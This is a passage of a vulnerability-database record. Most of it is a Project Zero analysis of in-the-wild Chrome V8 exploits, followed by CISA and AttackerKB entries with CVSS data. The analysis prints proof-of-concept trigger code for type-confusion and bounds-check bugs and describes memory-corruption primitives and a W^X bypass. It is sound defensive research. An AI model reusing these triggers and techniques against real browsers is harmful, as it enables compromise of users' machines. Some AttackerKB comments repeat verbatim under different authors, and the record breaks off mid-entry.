Therefore, the attacker can unexpectedly change, for example, the element representation of a JS array and trigger a type confusion similar to the one discussed above:\n\n'use strict';\n\n(function() {\n\nvar popped;\n\nfunction trigger(new_target) {\n\nfunction inner(new_target) {\n\nfunction constructor() {\n\npopped = Array.prototype.pop.call(array);\n\n}\n\nvar temp = array[0];\n\nreturn Reflect.construct(constructor, arguments, new_target);\n\n}\n\ninner(new_target);\n\n}\n\nvar array = new Array(0, 0, 0, 0, 0);\n\nfor (var i = 0; i < 20000; i++) {\n\ntrigger(function() { });\n\narray.push(0);\n\n}\n\nvar proxy = new Proxy(Object, {\n\nget: () => (array[4] = 1.1, Object.prototype)\n\n});\n\ntrigger(proxy);\n\nprint(popped);\n\n}()); \n \n--- \n \nA call reducer (i.e., an optimizer) for Array.prototype.pop invokes InferReceiverMapsUnsafe, which marks the inference result as reliable meaning that it doesn\u2019t require a runtime check. When the proxy object is passed to the vulnerable function, it triggers the tagged -> double element transition. Then pop takes a double element and interprets it as a tagged pointer value.\n\nNote that the attacker can\u2019t call the array function directly because for the expression array.pop() the compiler would insert an extra map check for the property read, which would be scheduled after the proxy handler had modified the array.\n\nThis is the only Chrome vulnerability that was still exploited as a 0-day at the time we discovered the exploit server. The issue was [reported to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=1053604>) under the 7-day deadline. 
[The one-line patch](<https://chromium.googlesource.com/v8/v8.git/+/fb0a60e15695466621cf65932f9152935d859447>) modified the vulnerable function to mark the result of the map inference as unreliable whenever it encounters a JSCreate node:\n\nInferReceiverMapsResult NodeProperties::InferReceiverMapsUnsafe(\n\n[...]\n\nInferReceiverMapsResult result = kReliableReceiverMaps;\n\n[...]\n\ncase IrOpcode::kJSCreate: {\n\nif (IsSame(receiver, effect)) {\n\nbase::Optional<MapRef> initial_map = GetJSCreateMap(broker, receiver);\n\nif (initial_map.has_value()) {\n\n*maps_return = ZoneHandleSet<Map>(initial_map->object());\n\nreturn result;\n\n}\n\n// We reached the allocation of the {receiver}.\n\nreturn kNoReceiverMaps;\n\n}\n\n+ result = kUnreliableReceiverMaps; // JSCreate can have side-effect.\n\nbreak;\n\n}\n\n[...] \n \n--- \n \nThe reader can refer to [the blog post](<https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping-chrome/>) published by Exodus Intel for more details on the issue and their version of the exploit.\n\n#### Exploit 1\n\nThis time there\u2019s no embedded list of supported browser versions; the appropriate constants for Chrome 60-63 are determined on the server side.\n\nThe exploit takes a rather exotic approach: it only implements a function for the confusion in the double -> tagged direction, i.e. the fakeobj primitive, and takes advantage of a side effect in pop to leak a pointer to the internal hole object. The function pop overwrites the \u201cpopped\u201d value with the hole, but due to the same confusion it writes a pointer instead of the special bit pattern for double arrays.\n\nThe exploit uses the leaked pointer and fakeobj to implement a data leak primitive that can \u201csurvive\u201d garbage collection. 
First, it acquires references to two other internal objects, the class_start_position and class_end_position private [symbols](<https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Symbol>), owing to the fact that the offset between them and the hole is fixed. Private symbols are special identifiers used by V8 to store hidden properties inside regular JS objects. In particular, the two symbols refer to the start and end substring indices in the script source that represent the body of a class. When JSFunction::ToString is invoked on the class constructor and builds the substring, it performs no bounds checks on the \u201ctrustworthy\u201d indices; therefore, the attacker can modify them to leak arbitrary chunks of data in the V8 heap.\n\nThe obtained data is scanned for values required to craft a fake typed array: maps, fixed arrays, backing store pointers, etc. This approach allows the attacker to construct a perfectly valid fake object. Since the object is located in a memory region outside the V8 heap, the exploit also has to create a fake MemoryChunk header and marking bitmap to force the garbage collector to skip the crafted objects and, thus, avoid crashes.\n\nFinally, the exploit overwrites the code of a JIT-compiled function with a payload and executes it.\n\nThe author has implemented extensive sanity checking. For example, the data leak primitive is reused to verify that the garbage collector hasn\u2019t moved critical objects. In case of a failure, the worker with the exploit gets terminated before it can cause a crash. 
Quite impressively, even when we manually put GC invocations into critical sections of the exploit, it was still able to exit gracefully most of the time.\n\nThe exploit employs an interesting technique to detect whether the trigger function has been JIT-compiled:\n\njit_detector[Symbol.toPrimitive] = function() {\n\nvar stack = (new Error).stack;\n\nif (stack.indexOf(\"Number (\") == -1) {\n\njit_detector.is_compiled = true;\n\n}\n\n};\n\nfunction trigger(array, proxy) {\n\nif (!jit_detector.is_compiled) {\n\nNumber(jit_detector);\n\n}\n\n[...] \n \n--- \n \nDuring compilation, TurboFan inlines the builtin function Number. This change is reflected in the JS call stack. Therefore, the attacker can scan a stack trace from inside a function that Number invokes to determine the compilation state.\n\nThe exploit was broken in Chrome 64 by [the change](<https://chromium.googlesource.com/v8/v8/+/52ab610bd13>) that encapsulated both class body indices in a single internal object. Although the change only affected a minor detail of the exploit and had an obvious workaround, which is discussed below, the actor decided to abandon this 0-day and switch to an exploit for CVE-2019-5782. This observation suggests that the attacker was already aware of the third vulnerability around the time Chrome 64 came out, i.e. it was also used as a 0-day.\n\n#### Exploit 2\n\nAfter CVE-2019-5782 became unexploitable, the actor returned to this vulnerability. However, in the meantime, [another commit](<https://chromium.googlesource.com/v8/v8/+/ccbbdb93a1c6f38422097738a830c137576d92fd>) landed in Chrome that stopped TurboFan from trying to optimize builtins invoked via Function.prototype.call or similar functions. 
Therefore, the trigger function had to be updated:\n\nfunction trigger(new_target) {\n\nfunction inner(new_target) {\n\npopped = array.pop(\n\nReflect.construct(function() { }, arguments, new_target));\n\n}\n\ninner(new_target);\n\n} \n \n--- \n \nBy making the result of Reflect.construct an argument to the pop call, the attacker can move the corresponding JSCreate node after the map check induced by the property load.\n\nThe new exploit also has a modified data leak primitive. First, the attacker no longer relies on the side effect in pop to get an address on the heap and reuses the type confusion to implement the addrof function. Because the exploit doesn\u2019t have a reference to the hole, it obtains the address of the builtin asyncIterator symbol instead, which is accessible to user scripts and also stored next to the desired class_positions private symbol.\n\nThe exploit can\u2019t modify the class body indices directly as they\u2019re not regular properties of the object referenced by class_positions. However, it can replace the entire object, so it generates an extra class with a much longer constructor string and uses it as a donor.\n\nThis version targets Chrome 68-72. It was broken by [the commit](<https://chromium.googlesource.com/v8/v8.git/+/f7aa8ea00bbf200e9050a22ec84fab4f323849a7%5E%21/>) that enabled the W^X protection for JIT regions. Again, given that there are still similar RWX mappings in the renderer related to WebAssembly, the exploit could have been easily fixed. The attacker, nevertheless, decided to focus on an exploit for CVE-2019-13764 instead.\n\n#### Exploit 3 & 4\n\nThe actor returned once again to this vulnerability after CVE-2019-13764 got fixed. The new exploit bypasses the W^X protection by replacing a JIT-compiled JS function with a WebAssembly function as the overwrite target for code execution. 
That\u2019s the only significant change made by the author.\n\nExploit 3 is the only one we\u2019ve discovered on the Windows server, and Exploit 4 is essentially the same exploit adapted for Android. Interestingly, it only appeared on the Android server after the fix for the vulnerability came out. A significant number of numeric and string literals got updated, and the pop call in the trigger function was replaced with a shift call. The actor likely attempted to avoid signature-based detection with those changes.\n\nThe exploits were used against Chrome 78-79 on Windows and 78-80 on Android until the vulnerability finally got patched.\n\n[The public exploit](<https://blog.exodusintel.com/wp-content/uploads/2020/05/exp.zip>) presented by Exodus Intel takes a completely different approach and abuses the fact that double and tagged pointer elements differ in size. When the same bug is applied against the function Array.prototype.push, the backing store offset for the new element is calculated incorrectly and, therefore, arbitrary data gets written past the end of the array. In this case the attacker doesn\u2019t have to craft fake objects to achieve arbitrary read/write, which greatly simplifies the exploit. However, on 64-bit systems, this approach can only be used starting from Chrome 80, i.e. the version that introduced the [pointer compression](<https://v8.dev/blog/pointer-compression>) feature. While Chrome still runs in the 32-bit mode on Android in order to reduce memory overhead, user agent checks found in the exploits indicate that the actor also targeted (possibly 64-bit) webview processes.\n\n### 3\\. CVE-2019-5782\n\n#### The vulnerability\n\nCVE-2019-5782 is an issue in TurboFan\u2019s typer module. During compilation, the typer infers the possible type of every node in a function graph using a set of rules imposed by the language. 
Subsequent optimization passes rely on this information and can, for example, eliminate a security-critical check when the predicted type suggests the check would be redundant. A mismatch between the inferred type and actual value can, therefore, lead to security issues.\n\nNote that in this context, the notion of type is quite different from, for example, C++ types. A TurboFan type can be represented by a range of numbers or even a specific value. For more information on typer bugs please refer to the [previous post](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>).\n\nIn this case an incorrect type is produced for the expression arguments.length, i.e. the number of arguments passed to a given function. The compiler assigns it the integer range [0; 65534], which is valid for a regular call; however, the same limit is not enforced for Function.prototype.apply. The mismatch was abused by the attacker to eliminate a bounds check and access data past the end of the array:\n\noob_index = 100000;\n\nfunction trigger() {\n\nlet array = [1.1, 1.1];\n\nlet index = arguments.length;\n\nindex = index - 65534;\n\nindex = Math.max(index, 0);\n\nreturn array[index] = 2.2;\n\n}\n\nfor (let i = 0; i < 20000; i++) {\n\ntrigger(1,2,3);\n\n}\n\nprint(trigger.apply(null, new Array(65534 + oob_index))); \n \n--- \n \nQixun Zhao used the same vulnerability in Tianfu Cup and [reported it to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=906043>) in November 2018. The public report includes a renderer exploit. [The fix](<https://chromium.googlesource.com/v8/v8/+/8e4588915ba7a9d9d744075781cea114d49f0c7b>), which landed in Chrome 72, simply relaxed the range of the length property.\n\n#### The exploit\n\nThe discovered exploit targets Chrome 63-67. The exploit flow is a bit unconventional as it doesn\u2019t rely on typed arrays to gain arbitrary read/write. 
The attacker makes use of the fact that V8 allocates objects in the new space linearly to precompute inter-object offsets. The vulnerability is only triggered once to corrupt the length property of a tagged pointer array. The corrupted array can then be used repeatedly to overwrite the elements field of an unboxed double array with an arbitrary JS object, which gives the attacker raw access to the contents of that object. It\u2019s worth noting that this approach doesn\u2019t even require performing manual pointer arithmetic. As usual, the exploit finishes by overwriting the code of a JS function with the payload.\n\nInterestingly, this is the only exploit that doesn\u2019t take advantage of running inside a web worker even though the vulnerability is fully compatible. Also, the amount of error checking is significantly smaller than in the previous exploits. The author probably assumed that the exploitation primitive provided by the issue was so reliable that all additional safety measures became unnecessary. Nevertheless, during our testing, we did occasionally encounter crashes when one of the allocations that the exploit makes managed to trigger garbage collection. That said, such crashes were indeed quite rare.\n\nAs the reader may have noticed, the exploit had stopped working long before the issue was fixed. The reason is that [one of the hardening patches](<https://chromium.googlesource.com/v8/v8.git/+/f53dfd934df0c95e1a82680ce87f48b5d60902d1%5E%21/>) against speculative side-channel attacks in V8 broke the bounds check elimination technique used by the exploit. 
The protection was soon turned off for desktop platforms and replaced with [site isolation](<https://www.chromium.org/Home/chromium-security/site-isolation>); hence, [the public exploit](<https://bugs.chromium.org/p/chromium/issues/detail?id=906043>), which employs the same technique, was successfully used against Chrome 70 on Windows during the competition.\n\nThe public and private exploits have little in common apart from the bug itself and BCE technique, which has been commonly known [since at least 2017](<https://bugs.chromium.org/p/chromium/issues/detail?id=762874>). The public exploit turns out-of-bounds access into a type confusion and then follows the older approach, which involves crafting a fake array buffer object, to achieve code execution.\n\n### 4\\. CVE-2019-13764\n\nThis more complex typer issue occurs when TurboFan doesn\u2019t reflect the possible NaN value in the type of an induction variable. The bug can be triggered by the following code:\n\nfor (var i = -Infinity; i < 0; i += Infinity) { [...] } \n \n--- \n \nThis vulnerability and exploit for Chrome 73-79 have been discussed in detail in [the previous blog post](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>). There\u2019s also an earlier version of the exploit targeting Chrome 69-72; the only difference is that the newer version switched from a JS JIT function to a WASM function as the overwrite target.\n\nThe comparison with the exploit for the previous typer issue (CVE-2019-5782) is more interesting, though. The developer put much greater emphasis on stability of the new exploit even though the two vulnerabilities are identical in this regard. The web worker wrapper is back, and the exploit doesn\u2019t corrupt tagged element arrays to avoid GC crashes. Also, it no longer relies completely on precomputed offsets between objects in the new space. 
For example, to leak a pointer to a JS object the attacker puts it between marker values and then scans the memory for the matching pattern. Finally, the number of sanity checks is increased again.\n\nIt\u2019s also worth noting that the new typer bug exploitation technique worked against Chrome on Android despite the side-channel attack mitigation and could have \u201crevived\u201d the exploit for CVE-2019-5782.\n\n### Conclusion\n\nThe timeline data and incremental changes between different exploit versions suggest that at least three out of the four vulnerabilities (CVE-2020-6418, CVE-2019-5782 and CVE-2019-13764) have been used as 0-days.\n\nIt is no secret that exploit reliability is a priority for high-tier attackers, but our findings demonstrate the amount of resources the attackers are willing to spend on making their exploits extra reliable, especially the evidence that the actor has switched from an already high-quality 0-day to a slightly better vulnerability twice.\n\nThe area of JIT engine security has received great attention from the wider security community over the last few years. In 2015, when Chrome 37 came out, the exploit for CVE-2017-5070 would be considered quite ahead of its time. In contrast, if we don\u2019t take into account the stability aspect, the exploit for the latest typer issue is not very different from exploits that enthusiasts made for JavaScript challenges at CTF competitions in 2019. This attention also likely affects the average lifetime of a JIT vulnerability and, therefore, may force attackers to move to different bug classes in the future.\n\nThis is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. 
To continue reading, see [In The Wild Part 4: Android Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-exploits.html>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "googleprojectzero", "title": "\nIn-the-Wild Series: Chrome Exploits\n", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2019-13764", "CVE-2019-5782", "CVE-2020-6418"], "modified": "2021-01-12T00:00:00", "id": "GOOGLEPROJECTZERO:9523EA61EA974CED8A3D9198CD0D5F6D", "href": "https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-exploits.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format. 
This CVE ID is unique from CVE-2020-0938.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Type 1 Font Parsing Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-1020", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format. 
This CVE ID is unique from CVE-2020-1020.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Type 1 Font Parsing Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-0938", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": 
"cisa_kev", "title": "Chromium V8 Type Confusion Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-6418", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-23T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Kernel Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": 
"LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1027"], "modified": "2022-05-23T00:00:00", "id": "CISA-KEV-CVE-2020-1027", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2021-08-02T17:31:15", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font \u2013 Adobe Type 1 PostScript format.For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely, aka \u2018Adobe Font Manager Library Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2020-0938.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 2:27am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. 
Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nThis is pretty similar to CVE-2020-1020 and its possible they were used together in a single attack, although for now this is just my theory and without full evidence this should be taken with a healthy few grains of salt.\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-15T00:00:00", "type": "attackerkb", "title": "CVE-2020-1020", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020"], "modified": "2021-07-22T00:00:00", "id": "AKB:D673396D-06D8-4D50-B1AD-97679B53A487", "href": "https://attackerkb.com/topics/IE2z4hqlku/cve-2020-1020", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-02T17:28:45", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font \u2013 Adobe Type 1 
PostScript format.For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely, aka \u2018Adobe Font Manager Library Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2020-1020.\n\n \n**Recent assessments:** \n \n**busterb** at March 24, 2020 12:11pm UTC reported:\n\nA fairly standard policy of disabling preview windows is a good mitigation for this vulnerability. Since this appears to have been found in the wild, but I\u2019m lowering this from original assessment, due to it being patched in the latest April 2020 PT, and there wasn\u2019t a particular rush to fix it out of band.\n\nTencent has an analysis of the vulnerabilities based on the PT diffs: <https://mp.weixin.qq.com/s/RvTZWvcXiXsI7xB6L9RWIg>\n\nFrom the MSRC advisory, this has limited impact on Windows 10.\n\n> For systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities.\n\n**bac2binary** at April 15, 2020 4:26pm UTC reported:\n\nA fairly standard policy of disabling preview windows is a good mitigation for this vulnerability. Since this appears to have been found in the wild, but I\u2019m lowering this from original assessment, due to it being patched in the latest April 2020 PT, and there wasn\u2019t a particular rush to fix it out of band.\n\nTencent has an analysis of the vulnerabilities based on the PT diffs: <https://mp.weixin.qq.com/s/RvTZWvcXiXsI7xB6L9RWIg>\n\nFrom the MSRC advisory, this has limited impact on Windows 10.\n\n> For systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities.\n\n**gwillcox-r7** at November 22, 2020 2:24am UTC reported:\n\nA fairly standard policy of disabling preview windows is a good mitigation for this vulnerability. 
Since this appears to have been found in the wild, but I\u2019m lowering this from original assessment, due to it being patched in the latest April 2020 PT, and there wasn\u2019t a particular rush to fix it out of band.\n\nTencent has an analysis of the vulnerabilities based on the PT diffs: <https://mp.weixin.qq.com/s/RvTZWvcXiXsI7xB6L9RWIg>\n\nFrom the MSRC advisory, this has limited impact on Windows 10.\n\n> For systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities.\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 2Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-15T00:00:00", "type": "attackerkb", "title": "ADV200006 - Type 1 Font Parsing Remote Code Execution Vulnerability in Windows", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020"], "modified": "2020-09-02T00:00:00", "id": "AKB:59EFDEC4-921E-411A-8743-CB603C4BC068", "href": 
"https://attackerkb.com/topics/P39wRxHASb/adv200006---type-1-font-parsing-remote-code-execution-vulnerability-in-windows", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:12:59", "description": "Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**J3rryBl4nks** at March 04, 2020 4:42pm UTC reported:\n\nYou would have to chain this vulnerability with a working sandbox escape in order to get full value. While there are no doubt working sandbox escapes, this is only one piece of the exploit chain that is necessary to get a reliable foothold on a machine.\n\nOften times there are full chain exploits published which include the code exec, sandbox escape, and a valid privesc but I have been unable to find a full chain for this exploit.\n\nFor the average attacker, this hill would be too high to climb to make this useful.\n\n**tekwizz123** at March 09, 2020 2:14am UTC reported:\n\nYou would have to chain this vulnerability with a working sandbox escape in order to get full value. While there are no doubt working sandbox escapes, this is only one piece of the exploit chain that is necessary to get a reliable foothold on a machine.\n\nOften times there are full chain exploits published which include the code exec, sandbox escape, and a valid privesc but I have been unable to find a full chain for this exploit.\n\nFor the average attacker, this hill would be too high to climb to make this useful.\n\n**kevthehermit** at March 04, 2020 4:01pm UTC reported:\n\nYou would have to chain this vulnerability with a working sandbox escape in order to get full value. 
While there are no doubt working sandbox escapes, this is only one piece of the exploit chain that is necessary to get a reliable foothold on a machine.\n\nOften times there are full chain exploits published which include the code exec, sandbox escape, and a valid privesc but I have been unable to find a full chain for this exploit.\n\nFor the average attacker, this hill would be too high to climb to make this useful.\n\n**gwillcox-r7** at November 22, 2020 2:19am UTC reported:\n\nYou would have to chain this vulnerability with a working sandbox escape in order to get full value. While there are no doubt working sandbox escapes, this is only one piece of the exploit chain that is necessary to get a reliable foothold on a machine.\n\nOften times there are full chain exploits published which include the code exec, sandbox escape, and a valid privesc but I have been unable to find a full chain for this exploit.\n\nFor the average attacker, this hill would be too high to climb to make this useful.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-02-27T00:00:00", "type": "attackerkb", "title": "CVE-2020-6418", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", 